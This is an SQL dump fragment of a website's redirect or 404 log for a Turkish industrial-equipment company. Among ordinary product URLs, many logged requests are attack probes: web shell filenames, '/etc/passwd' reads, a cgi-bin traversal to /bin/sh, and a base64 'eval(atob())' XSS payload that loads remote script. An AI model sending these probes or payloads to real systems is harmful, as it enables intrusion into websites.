00:00:00',301),(29220,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',7,0,'2022-05-17 18:14:26','0000-00-00 00:00:00',301),(29221,'http://3s-technologies.com.tr/tr/assets/plugins/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-05-18 14:53:00','0000-00-00 00:00:00',301),(29222,'http://3s-technologies.com.tr/en/wp-content/themes/sketch/404.php',NULL,'www.google.com','',6,0,'2022-05-18 16:35:08','0000-00-00 00:00:00',301),(29223,'http://3s-technologies.com.tr/en/wp-content/themes/twentyfive/include.php',NULL,'www.google.com','',7,0,'2022-05-18 16:35:15','0000-00-00 00:00:00',301),(29224,'http://3s-technologies.com.tr/en/wp/wp-content/themes/sketch/404.php',NULL,'www.google.com','',2,0,'2022-05-18 16:35:22','0000-00-00 00:00:00',301),(29225,'http://3s-technologies.com.tr/en/wordpress/wp-content/themes/sketch/404.php',NULL,'www.google.com','',1,0,'2022-05-18 16:35:29','0000-00-00 00:00:00',301),(29226,'http://3s-technologies.com.tr/en/blog/wp-content/themes/sketch/404.php',NULL,'www.google.com','',1,0,'2022-05-18 16:35:37','0000-00-00 00:00:00',301),(29227,'http://3s-technologies.com.tr/en/site/wp-content/themes/sketch/404.php',NULL,'www.google.com','',1,0,'2022-05-18 16:35:43','0000-00-00 00:00:00',301),(29228,'http://3s-technologies.com.tr/en/mjbitgre.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-19 02:43:54','0000-00-00 00:00:00',301),(29229,'https://3s-technologies.com.tr/en/mjbitgre.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-19 02:44:08','0000-00-00 00:00:00',301),(29230,'http://3s-technologies.com.tr/en/wp-content/uploads/typehub/custom/jhimiohv/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-19 19:10:50','0000-00-00 00:00:00',301),(29231,'https://3s-technologies.com.tr/wp-admin/admin-ajax.php',NULL,'www.google.com','',18,0,'2022-05-19 19:10:55','0000-00-00 00:00:00',301),(29232,'https://3s-technologies.com.tr/en/wp-content/uploads/typehub/custom/iiampfes/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-19 19:11:02','0000-00-00 00:00:00',301),(29233,'http://3s-technologies.com.tr/tr/plugins/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-05-20 12:17:38','0000-00-00 00:00:00',301),(29234,'http://3s-technologies.com.tr/tr/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-05-22 02:59:43','0000-00-00 00:00:00',301),(29235,'https://3s-technologies.com.tr/tr/wood-processing-ah��ap-i��leme',NULL,'','',9,0,'2022-05-23 01:34:09','0000-00-00 00:00:00',301),(29236,'https://3s-technologies.com.tr/tr/��r��nler/thru-hole',NULL,'','',7,0,'2022-05-23 01:41:18','0000-00-00 00:00:00',301),(29237,'https://3s-technologies.com.tr/tr/��r��nler/screen-printer',NULL,'','',8,0,'2022-05-23 01:53:20','0000-00-00 00:00:00',301),(29238,'https://3s-technologies.com.tr/tr/��r��nler/smd-f��r��n',NULL,'','',8,0,'2022-05-23 01:59:12','0000-00-00 00:00:00',301),(29239,'https://3s-technologies.com.tr/tr/��r��nler/konveyorler',NULL,'','',7,0,'2022-05-23 02:00:33','0000-00-00 00:00:00',301),(29240,'https://3s-technologies.com.tr/tr/ah��ap-i��leme-wood-processing-120cm',NULL,'','',7,0,'2022-05-23 02:05:08','0000-00-00 00:00:00',301),(29241,'https://3s-technologies.com.tr/tr/akrilik-i��leme-acrylic-processing',NULL,'','',8,0,'2022-05-23 02:10:09','0000-00-00 00:00:00',301),(29242,'https://3s-technologies.com.tr/tr/��r��nler/smd-ultra-h��z',NULL,'','',10,0,'2022-05-23 02:13:13','0000-00-00 00:00:00',301),(29243,'https://3s-technologies.com.tr/tr/��r��nler/cnc',NULL,'','',8,0,'2022-05-23 02:20:58','0000-00-00 00:00:00',301),(29244,'https://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��',NULL,'','',8,0,'2022-05-23 02:21:33','0000-00-00 00:00:00',301),(29245,'https://3s-technologies.com.tr/tr/hakk��m��zda',NULL,'','',7,0,'2022-05-23 02:37:10','0000-00-00 00:00:00',301),(29246,'https://3s-technologies.com.tr/tr/aluminyum-i��leme-aluminum-processing',NULL,'','',12,0,'2022-05-23 02:40:44','0000-00-00 00:00:00',301),(29247,'https://3s-technologies.com.tr/tr/��r��nler/odd-shape-inserter',NULL,'','',8,0,'2022-05-23 03:01:08','0000-00-00 00:00:00',301),(29248,'https://3s-technologies.com.tr/tr/��r��nler/temizleme-makineleri',NULL,'','',7,0,'2022-05-23 03:11:30','0000-00-00 00:00:00',301),(29249,'https://3s-technologies.com.tr/tr/��r��nler/lazer-markalama',NULL,'','',7,0,'2022-05-23 03:19:32','0000-00-00 00:00:00',301),(29250,'https://3s-technologies.com.tr/tr/��r��nler/dalga-lehim',NULL,'','',11,0,'2022-05-23 03:22:37','0000-00-00 00:00:00',301),(29251,'https://3s-technologies.com.tr/tr/��r��nler/b��lgesel-lehimleme',NULL,'','',9,0,'2022-05-23 03:23:05','0000-00-00 00:00:00',301),(29252,'https://3s-technologies.com.tr/tr/��r��nler/smd-d������k-h��zl��',NULL,'','',8,0,'2022-05-23 03:24:28','0000-00-00 00:00:00',301),(29253,'http://3s-technologies.com.tr/tr/zbilakntkhdamehhhshelldzb.php',NULL,'','',1,0,'2022-05-23 11:44:33','0000-00-00 00:00:00',301),(29254,'http://3s-technologies.com.tr/tr/imagesvuln.php',NULL,'','',13,0,'2022-05-23 11:46:48','0000-00-00 00:00:00',301),(29255,'http://3s-technologies.com.tr/tr/admin/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-05-24 03:54:57','0000-00-00 00:00:00',301),(29256,'http://www.3s-technologies.com.tr/en/wikindex.php?f=/bmluxzleairiek7s/umvusxn4hvg3bzrf.txt',NULL,'','',1,0,'2022-05-25 08:23:02','0000-00-00 00:00:00',301),(29257,'http://www.3s-technologies.com.tr/en/wp-content/mu-plugins-old/index.php?f=/bmluxzleairiek7s/umvusxn4hvg3bzrf.txt',NULL,'','',1,0,'2022-05-25 08:23:08','0000-00-00 00:00:00',301),(29258,'http://3s-technologies.com.tr/tr/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-05-25 16:14:02','0000-00-00 00:00:00',301),(29259,'http://3s-technologies.com.tr/tr/public/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-05-27 03:21:14','0000-00-00 00:00:00',301),(29260,'http://3s-technologies.com.tr/tr/defaul1.php',NULL,'','',21,0,'2022-05-27 04:14:34','0000-00-00 00:00:00',301),(29261,'http://3s-technologies.com.tr/tr/defau11.php',NULL,'','',3,0,'2022-05-27 04:14:35','0000-00-00 00:00:00',301),(29262,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter/npm-vf-detail',NULL,'','',1,0,'2022-05-27 08:40:40','0000-00-00 00:00:00',301),(29263,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/npm-w2s-detail?tmpl=component&print=1',NULL,'','',1,0,'2022-05-28 08:49:00','0000-00-00 00:00:00',301),(29264,'http://3s-technologies.com.tr/tr/admin/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-05-28 13:22:28','0000-00-00 00:00:00',301),(29265,'http://3s-technologies.com.tr/tr/admin/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-05-30 01:19:18','0000-00-00 00:00:00',301),(29266,'http://3s-technologies.com.tr/tr/wp-class.php',NULL,'http://3s-technologies.com.tr/wp-class.php','',131,0,'2022-05-30 12:42:16','0000-00-00 00:00:00',301),(29267,'http://3s-technologies.com.tr/tr/991176.php',NULL,'http://3s-technologies.com.tr/991176.php','',4,0,'2022-05-30 19:01:18','0000-00-00 00:00:00',301),(29268,'http://3s-technologies.com.tr/tr/theme/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-05-31 12:23:29','0000-00-00 00:00:00',301),(29269,'http://www.3s-technologies.com.tr/en/feed',NULL,'http://www.3s-technologies.com.tr/feed/','',5,0,'2022-06-01 09:48:05','0000-00-00 00:00:00',301),(29270,'https://3s-technologies.com.tr/tr/?format=feed\'[0]&type=rss',NULL,'','',2,0,'2022-06-01 13:14:34','0000-00-00 00:00:00',301),(29271,'https://3s-technologies.com.tr/tr/?format=\"><input onfocus=eval(atob(this.id)) id=dmfyige9zg9jdw1lbnquy3jlyxrlrwxlbwvudcgic2nyaxb0iik7ys5zcmm9imh0dhbzoi8vc2fteteymy54c3muahqio2rvy3vtzw50lmjvzhkuyxbwzw5kq2hpbgqoysk7 autofocus>&type=rss',NULL,'','',2,0,'2022-06-01 13:14:37','0000-00-00 00:00:00',301),(29272,'https://3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'[0]',NULL,'','',2,0,'2022-06-01 13:14:39','0000-00-00 00:00:00',301),(29273,'https://3s-technologies.com.tr/tr/?format=/etc/passwd&type=rss',NULL,'','',2,0,'2022-06-01 13:14:40','0000-00-00 00:00:00',301),(29274,'https://3s-technologies.com.tr/tr/component/search/?itemid=594&format=\"><input onfocus=eval(atob(this.id)) id=dmfyige9zg9jdw1lbnquy3jlyxrlrwxlbwvudcgic2nyaxb0iik7ys5zcmm9imh0dhbzoi8vc2fteteymy54c3muahqio2rvy3vtzw50lmjvzhkuyxbwzw5kq2hpbgqoysk7 autofocus>',NULL,'','',1,0,'2022-06-01 13:14:40','0000-00-00 00:00:00',301),(29275,'https://3s-technologies.com.tr/tr/component/search/?itemid=594&format=/etc/passwd',NULL,'','',2,0,'2022-06-01 13:14:42','0000-00-00 00:00:00',301),(29276,'http://3s-technologies.com.tr/tr/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-06-01 20:51:15','0000-00-00 00:00:00',301),(29277,'http://3s-technologies.com.tr/tr/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'','',10,0,'2022-06-02 00:31:17','0000-00-00 00:00:00',301),(29278,'http://3s-technologies.com.tr/tr/wp-admin/xleet.php',NULL,'','',11,0,'2022-06-02 00:31:19','0000-00-00 00:00:00',301),(29279,'http://3s-technologies.com.tr/tr/wp-admin/fx.php',NULL,'','',11,0,'2022-06-02 00:31:20','0000-00-00 00:00:00',301),(29280,'http://3s-technologies.com.tr/tr/wp-admin/priv8.php',NULL,'','',11,0,'2022-06-02 00:31:22','0000-00-00 00:00:00',301),(29281,'http://3s-technologies.com.tr/tr/wp-admin/rss.php',NULL,'','',10,0,'2022-06-02 00:31:22','0000-00-00 00:00:00',301),(29282,'http://3s-technologies.com.tr/tr/uploads/xleet.php',NULL,'','',11,0,'2022-06-02 00:31:23','0000-00-00 00:00:00',301),(29283,'http://3s-technologies.com.tr/tr/wp-admin/fox-c',NULL,'','',10,0,'2022-06-02 00:31:24','0000-00-00 00:00:00',301),(29284,'http://3s-technologies.com.tr/tr/wp-admin/fox-c404',NULL,'','',10,0,'2022-06-02 00:31:25','0000-00-00 00:00:00',301),(29285,'http://3s-technologies.com.tr/tr/fox-c40',NULL,'','',10,0,'2022-06-02 00:31:25','0000-00-00 00:00:00',301),(29286,'http://3s-technologies.com.tr/tr/wp-admin/alfa_data/alfacgiapi',NULL,'','',13,0,'2022-06-02 00:31:26','0000-00-00 00:00:00',301),(29287,'http://3s-technologies.com.tr/tr/wp-admin/panels.txt',NULL,'','',10,0,'2022-06-02 00:31:26','0000-00-00 00:00:00',301),(29288,'http://3s-technologies.com.tr/tr/panels.txt',NULL,'','',10,0,'2022-06-02 00:31:27','0000-00-00 00:00:00',301),(29289,'http://3s-technologies.com.tr/tr/backoffice',NULL,'http://3s-technologies.com.tr/tr/Backoffice','',3,0,'2022-06-02 10:42:27','0000-00-00 00:00:00',301),(29290,'http://3s-technologies.com.tr/search/',NULL,'','',1,0,'2022-06-03 03:39:52','0000-00-00 00:00:00',301),(29291,'http://3s-technologies.com.tr/run',NULL,'','',1,0,'2022-06-03 03:39:53','0000-00-00 00:00:00',301),(29292,'http://3s-technologies.com.tr/actuator/gateway/refresh',NULL,'','',1,0,'2022-06-03 03:43:10','0000-00-00 00:00:00',301),(29293,'http://3s-technologies.com.tr/tr/assets/uploadify/uploadify.css',NULL,'','',3,0,'2022-06-03 06:12:19','0000-00-00 00:00:00',301),(29294,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/by,ordering?language=tr-tr&keyword=',NULL,'','',1,0,'2022-06-04 01:12:14','0000-00-00 00:00:00',301),(29295,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/mi-300-detail',NULL,'','',1,0,'2022-06-04 08:19:51','0000-00-00 00:00:00',301),(29296,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/lfs-1-detail',NULL,'','',2,0,'2022-06-04 14:33:16','0000-00-00 00:00:00',301),(29297,'http://3s-technologies.com.tr/tr/admin/uploadify/uploadify.css',NULL,'','',3,0,'2022-06-04 16:08:06','0000-00-00 00:00:00',301),(29298,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/feed/',NULL,'','',94,0,'2022-06-04 17:19:51','0000-00-00 00:00:00',301),(29299,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/xmlrpc.php?rsd',NULL,'','',94,0,'2022-06-04 17:19:51','0000-00-00 00:00:00',301),(29300,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/blog/wp-includes/wlwmanifest.xml',NULL,'','',94,0,'2022-06-04 17:19:51','0000-00-00 00:00:00',301),(29301,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/web/wp-includes/wlwmanifest.xml',NULL,'','',94,0,'2022-06-04 17:19:52','0000-00-00 00:00:00',301),(29302,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/wordpress/wp-includes/wlwmanifest.xml',NULL,'','',94,0,'2022-06-04 17:19:52','0000-00-00 00:00:00',301),(29303,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/wp/wp-includes/wlwmanifest.xml',NULL,'','',94,0,'2022-06-04 17:19:52','0000-00-00 00:00:00',301),(29304,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/2020/wp-includes/wlwmanifest.xml',NULL,'','',94,0,'2022-06-04 17:19:53','0000-00-00 00:00:00',301),(29305,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/2019/wp-includes/wlwmanifest.xml',NULL,'','',94,0,'2022-06-04 17:19:53','0000-00-00 00:00:00',301),(29306,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/2021/wp-includes/wlwmanifest.xml',NULL,'','',94,0,'2022-06-04 17:19:53','0000-00-00 00:00:00',301),(29307,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/shop/wp-includes/wlwmanifest.xml',NULL,'','',93,0,'2022-06-04 17:19:53','0000-00-00 00:00:00',301),(29308,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/wp1/wp-includes/wlwmanifest.xml',NULL,'','',93,0,'2022-06-04 17:19:54','0000-00-00 00:00:00',301),(29309,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/test/wp-includes/wlwmanifest.xml',NULL,'','',93,0,'2022-06-04 17:19:54','0000-00-00 00:00:00',301),(29310,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/site/wp-includes/wlwmanifest.xml',NULL,'','',93,0,'2022-06-04 17:19:54','0000-00-00 00:00:00',301),(29311,'https://3s-technologies.com.tr/en/wp-includes/id3/license.txt/cms/wp-includes/wlwmanifest.xml',NULL,'','',93,0,'2022-06-04 17:19:55','0000-00-00 00:00:00',301),(29312,'http://3s-technologies.com.tr/tr/admin/assets/uploadify/uploadify.css',NULL,'','',3,0,'2022-06-06 10:44:57','0000-00-00 00:00:00',301),(29313,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,category_name?language=tr-tr&keyword=',NULL,'','',3,0,'2022-06-06 12:21:29','0000-00-00 00:00:00',301),(29314,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/spartan-8s-8d-detail',NULL,'','',3,0,'2022-06-06 19:59:40','0000-00-00 00:00:00',301),(29315,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/dirdesc?language=tr-tr&keyword=',NULL,'','',3,0,'2022-06-06 23:10:34','0000-00-00 00:00:00',301),(29316,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/by,`p`.product_sku/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2022-06-07 06:14:46','0000-00-00 00:00:00',301),(29317,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,mf_name?language=tr-tr&keyword=',NULL,'','',3,0,'2022-06-07 06:19:48','0000-00-00 00:00:00',301),(29318,'http://3s-technologies.com.tr/tr/plugins/uploadify/uploadify.css',NULL,'','',3,0,'2022-06-07 20:23:34','0000-00-00 00:00:00',301),(29319,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/dalga-lehim?language=tr-tr&keyword=',NULL,'','',3,0,'2022-06-07 20:33:15','0000-00-00 00:00:00',301),(29320,'http://3s-technologies.com.tr/tr/teroaa.php',NULL,'','',1,0,'2022-06-07 23:43:38','0000-00-00 00:00:00',301),(29321,'http://3s-technologies.com.tr/tr/fux.php',NULL,'','',1,0,'2022-06-07 23:44:05','0000-00-00 00:00:00',301),(29322,'http://3s-technologies.com.tr/tr/fuck.php',NULL,'','',1,0,'2022-06-07 23:44:07','0000-00-00 00:00:00',301),(29323,'http://3s-technologies.com.tr/tr/zbi.php',NULL,'','',1,0,'2022-06-07 23:44:11','0000-00-00 00:00:00',301),(29324,'http://3s-technologies.com.tr/tr/zabi.php',NULL,'','',1,0,'2022-06-07 23:44:13','0000-00-00 00:00:00',301),(29325,'http://3s-technologies.com.tr/tr/mail.php',NULL,'','',241,0,'2022-06-07 23:44:15','0000-00-00 00:00:00',301),(29326,'http://3s-technologies.com.tr/tr/inbox.php',NULL,'','',2,0,'2022-06-07 23:44:19','0000-00-00 00:00:00',301),(29327,'http://3s-technologies.com.tr/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh',NULL,'','',1,0,'2022-06-08 08:20:06','0000-00-00 00:00:00',301),(29328,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',2,0,'2022-06-08 11:15:53','0000-00-00 00:00:00',301),(29329,'http://mail.3s-technologies.com.tr/en/wp-load.php',NULL,'www.bing.com','',8,0,'2022-06-08 13:38:29','0000-00-00 00:00:00',301),(29330,'http://mail.3s-technologies.com.tr/en/style.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:38:30','0000-00-00 00:00:00',301),(29331,'http://mail.3s-technologies.com.tr/en/wp-admin/style.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:38:31','0000-00-00 00:00:00',301),(29332,'http://mail.3s-technologies.com.tr/en/s_e.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:39:17','0000-00-00 00:00:00',301),(29333,'http://mail.3s-technologies.com.tr/en/s_ne.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:39:21','0000-00-00 00:00:00',301),(29334,'http://mail.3s-technologies.com.tr/en/wikindex.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',3,0,'2022-06-08 13:40:11','0000-00-00 00:00:00',301),(29335,'http://mail.3s-technologies.com.tr/en/wp-content/mu-plugins-old/index.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',3,0,'2022-06-08 13:40:22','0000-00-00 00:00:00',301),(29336,'http://mail.3s-technologies.com.tr/en/radio.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:40:31','0000-00-00 00:00:00',301),(29337,'http://mail.3s-technologies.com.tr/en/lock360.php?daksldlkdsadas=1',NULL,'www.bing.com','',3,0,'2022-06-08 13:40:39','0000-00-00 00:00:00',301),(29338,'http://mail.3s-technologies.com.tr/en/old-index.php?daksldlkdsadas=1',NULL,'www.bing.com','',2,0,'2022-06-08 13:41:14','0000-00-00 00:00:00',301),(29339,'http://mail.3s-technologies.com.tr/en/xmrlpc.php?daksldlkdsadas=1',NULL,'www.bing.com','',3,0,'2022-06-08 13:41:31','0000-00-00 00:00:00',301),(29340,'http://mail.3s-technologies.com.tr/en/xmlrpcs.php?daksldlkdsadas=1',NULL,'www.bing.com','',3,0,'2022-06-08 13:41:41','0000-00-00 00:00:00',301),(29341,'http://mail.3s-technologies.com.tr/en/wp-admin.php?daksldlkdsadas=1',NULL,'www.bing.com','',3,0,'2022-06-08 13:42:19','0000-00-00 00:00:00',301),(29342,'http://mail.3s-technologies.com.tr/en/qindex.php?daksldlkdsadas=1',NULL,'www.bing.com','',3,0,'2022-06-08 13:42:47','0000-00-00 00:00:00',301),(29343,'http://mail.3s-technologies.com.tr/en/doc.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:42:59','0000-00-00 00:00:00',301),(29344,'http://mail.3s-technologies.com.tr/en/wp_wrong_datlib.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:43:01','0000-00-00 00:00:00',301),(29345,'http://mail.3s-technologies.com.tr/en/beence.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:43:11','0000-00-00 00:00:00',301),(29346,'http://mail.3s-technologies.com.tr/en/ups.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:43:26','0000-00-00 00:00:00',301),(29347,'http://mail.3s-technologies.com.tr/en/wp-signin.php?dizo&ping',NULL,'www.bing.com','',4,0,'2022-06-08 13:43:47','0000-00-00 00:00:00',301),(29348,'http://mail.3s-technologies.com.tr/en/media-admin.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:43:56','0000-00-00 00:00:00',301),(29349,'http://mail.3s-technologies.com.tr/en/export.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:43:58','0000-00-00 00:00:00',301),(29350,'http://mail.3s-technologies.com.tr/en/wp-content/export.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:43:59','0000-00-00 00:00:00',301),(29351,'http://mail.3s-technologies.com.tr/en/wp-includes/wp-class.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:44:45','0000-00-00 00:00:00',301),(29352,'http://mail.3s-technologies.com.tr/en/wp-includes/wp-atom.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:44:58','0000-00-00 00:00:00',301),(29353,'http://mail.3s-technologies.com.tr/en/wp-includes/images/css.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:45:16','0000-00-00 00:00:00',301),(29354,'http://mail.3s-technologies.com.tr/en/wp-includes/css/css.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:45:17','0000-00-00 00:00:00',301),(29355,'http://mail.3s-technologies.com.tr/en/defau1t.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:45:21','0000-00-00 00:00:00',301),(29356,'http://mail.3s-technologies.com.tr/en/css.php',NULL,'www.bing.com','',3,0,'2022-06-08 13:45:26','0000-00-00 00:00:00',301),(29357,'http://mail.3s-technologies.com.tr/en/moduless.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:45:41','0000-00-00 00:00:00',301),(29358,'http://mail.3s-technologies.com.tr/en/wp-booking.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:46:17','0000-00-00 00:00:00',301),(29359,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/backup_index.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:46:32','0000-00-00 00:00:00',301),(29360,'http://mail.3s-technologies.com.tr/en/wp-content/mu-plugins/db-safe-mode.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:46:56','0000-00-00 00:00:00',301),(29361,'http://mail.3s-technologies.com.tr/en/wp-includes/css/wp-config.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:47:15','0000-00-00 00:00:00',301),(29362,'http://mail.3s-technologies.com.tr/en/config.bak.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:47:19','0000-00-00 00:00:00',301),(29363,'http://mail.3s-technologies.com.tr/en/wp-content/themes/config.bak.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:47:19','0000-00-00 00:00:00',301),(29364,'http://mail.3s-technologies.com.tr/en/legion.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:48:26','0000-00-00 00:00:00',301),(29365,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/wpconfig.bak.php?act=sf',NULL,'www.bing.com','',5,0,'2022-06-08 13:48:35','0000-00-00 00:00:00',301),(29366,'http://mail.3s-technologies.com.tr/en/wp-plugins.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:48:47','0000-00-00 00:00:00',301),(29367,'http://mail.3s-technologies.com.tr/en/gank.php.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:49:08','0000-00-00 00:00:00',301),(29368,'http://mail.3s-technologies.com.tr/en/wp-content/db-cache.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:49:31','0000-00-00 00:00:00',301),(29369,'http://mail.3s-technologies.com.tr/en/archives.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:49:55','0000-00-00 00:00:00',301),(29370,'http://mail.3s-technologies.com.tr/en/xindex.php',NULL,'www.bing.com','',3,0,'2022-06-08 13:50:02','0000-00-00 00:00:00',301),(29371,'http://mail.3s-technologies.com.tr/en/defau11.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:50:07','0000-00-00 00:00:00',301),(29372,'http://mail.3s-technologies.com.tr/en/wp-content/outcms.php?up',NULL,'www.bing.com','',4,0,'2022-06-08 13:50:31','0000-00-00 00:00:00',301),(29373,'http://mail.3s-technologies.com.tr/en/system_log.php?bala=up',NULL,'www.bing.com','',4,0,'2022-06-08 13:50:37','0000-00-00 00:00:00',301),(29374,'http://mail.3s-technologies.com.tr/en/wp-backup-sql-302.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:50:48','0000-00-00 00:00:00',301),(29375,'http://mail.3s-technologies.com.tr/en/error.php?phpshells',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:08','0000-00-00 00:00:00',301),(29376,'http://mail.3s-technologies.com.tr/en/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:11','0000-00-00 00:00:00',301),(29377,'http://mail.3s-technologies.com.tr/en/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:11','0000-00-00 00:00:00',301),(29378,'http://mail.3s-technologies.com.tr/en/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:11','0000-00-00 00:00:00',301),(29379,'http://mail.3s-technologies.com.tr/en/.well-known/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:12','0000-00-00 00:00:00',301),(29380,'http://mail.3s-technologies.com.tr/en/.well-known/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:12','0000-00-00 00:00:00',301),(29381,'http://mail.3s-technologies.com.tr/en/.well-known/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:13','0000-00-00 00:00:00',301),(29382,'http://mail.3s-technologies.com.tr/en/wp-content/uploads/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:13','0000-00-00 00:00:00',301),(29383,'http://mail.3s-technologies.com.tr/en/wp-content/uploads/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:14','0000-00-00 00:00:00',301),(29384,'http://mail.3s-technologies.com.tr/en/wp-content/uploads/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:15','0000-00-00 00:00:00',301),(29385,'http://mail.3s-technologies.com.tr/en/wp-includes/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:15','0000-00-00 00:00:00',301),(29386,'http://mail.3s-technologies.com.tr/en/wp-includes/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:16','0000-00-00 00:00:00',301),(29387,'http://mail.3s-technologies.com.tr/en/wp-includes/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:16','0000-00-00 00:00:00',301),(29388,'http://mail.3s-technologies.com.tr/en/wp-admin/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:16','0000-00-00 00:00:00',301),(29389,'http://mail.3s-technologies.com.tr/en/wp-admin/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:17','0000-00-00 00:00:00',301),(29390,'http://mail.3s-technologies.com.tr/en/wp-admin/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:17','0000-00-00 00:00:00',301),(29391,'http://mail.3s-technologies.com.tr/en/wp-content/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:18','0000-00-00 00:00:00',301),(29392,'http://mail.3s-technologies.com.tr/en/wp-content/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:19','0000-00-00 00:00:00',301),(29393,'http://mail.3s-technologies.com.tr/en/wp-content/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:19','0000-00-00 00:00:00',301),(29394,'http://mail.3s-technologies.com.tr/en/templates/beez3/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:20','0000-00-00 00:00:00',301),(29395,'http://mail.3s-technologies.com.tr/en/templates/beez3/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:20','0000-00-00 